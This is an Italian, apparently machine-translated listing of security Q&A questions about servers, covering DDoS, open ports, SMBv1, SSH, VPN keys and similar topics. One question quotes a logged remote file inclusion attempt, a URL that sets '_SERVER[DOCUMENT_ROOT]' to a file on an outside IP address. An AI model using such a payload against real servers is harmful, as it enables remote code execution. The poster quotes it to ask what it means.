Domande con tag 'server'

domande con tag
2
risposte

Usa mining per prevenire attacchi DDOS su websocket: è una soluzione praticabile?

Penso che il modo seguente sia un buon modo per prevenire completamente e totalmente i ddos sul mio server. La mia idea è di utilizzare lo stesso meccanismo di mining criptovaluta (bitcoin, con sha256 o qualsiasi altro hash) per prevenire DDOS....
posta 30.05.2018 - 04:26
2
risposte

Quali servizi portuali possono utilizzare gli hacker per entrare in un server?

Mi sto preparando per eseguire il mio primo server. Userò ufw per disabilitare ogni porta tranne la porta 22 per ssh e la porta 80 per http . Sono curioso però. Supponiamo teoricamente di aver lasciato ogni porta aperta trann...
posta 23.11.2014 - 20:58
1
risposta

Che cosa fare se SMBv1 è ancora in esecuzione sulla rete?

Stavo controllando il traffico di rete nella nostra azienda mentre preformavo un controllo di sicurezza e ho scoperto che abbiamo ancora un server che esegue SMBv1 sulla rete. Il server è un controller di dominio di Windows 2003 e viene anche...
posta 06.07.2017 - 23:04
3
risposte

La posta elettronica può essere crittografata prima che raggiunga il server di posta? Se no, c'è qualcosa che consentirebbe qualcosa come questo su cui si sta lavorando?

Stavo pensando di ospitare la mia email (proprio server di posta) invece di usare Gmail. Ma poi mi sono reso conto che non potrei mai ospitare la mia email su un server in cui sto anche ospitando Wordpress. Questo perché avrei sempre paura che q...
posta 02.01.2013 - 01:11
4
risposte

Qual è il modo migliore per proteggere le comunicazioni tra server per i server cloud?

Sto cercando le migliori pratiche o suggerimenti per proteggere le comunicazioni tra i server tra i VPS. Devo eseguire tutto il traffico tramite SSH? E il traffico HTTP tramite qualcosa come mongo? Reverse proxy sulla stessa macchina per h...
posta 16.02.2014 - 17:41
3
risposte

Attacco root del server?

Qualcuno in Ungheria ha provato qualcosa di strano di recente: /?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt? Questo è l'URL parziale del mio log, che mostra la pagina a cui sono andati. Hanno dato l'URL del mio sito come referrer...
posta 06.04.2013 - 13:08
1
risposta

L'installazione di un'interfaccia grafica utente in un server costituirà un problema di sicurezza?

Non sono un amante della CLI, a volte preferisco svolgere alcune attività in un server usando una GUI piuttosto che usare la CLI (velocizza il mio lavoro), ma non so se installare una GUI e accedervi utilizzando VNC e SSH si comprometterà la sic...
posta 17.02.2016 - 00:21
1
risposta

SSH e man-in-the-middle

Assumi il seguente scenario e, per favore, correggimi se sbaglio da qualche parte: C'è un client e c'è un server SSH al quale il client si connette. C'è anche un man-in-the-middle (MIM) che è in grado di intercettare il traffico in entrata e...
posta 07.01.2018 - 09:24
1
risposta

Chi è il custode del cancello?

Se si utilizza la protezione di base in una connessione SSL (https), non è vero che il server corrisponde alla combinazione utente / password, ma cosa succede dopo? Cosa impedisce al browser di accedere al server? Il browser entra in uno stato "...
posta 20.05.2017 - 08:23
1
risposta

OpenVPN: posizione di archiviazione e creazione di chiavi / certificati?

Sto ripristinando l'infrastruttura OpenVPN per essere più sicuro dell'originale e ho desiderato alcune indicazioni. Si è notato che la migliore politica di sicurezza è quella di mantenere l'autorità di certificazione (CA) offline e separata d...
posta 07.09.2014 - 23:17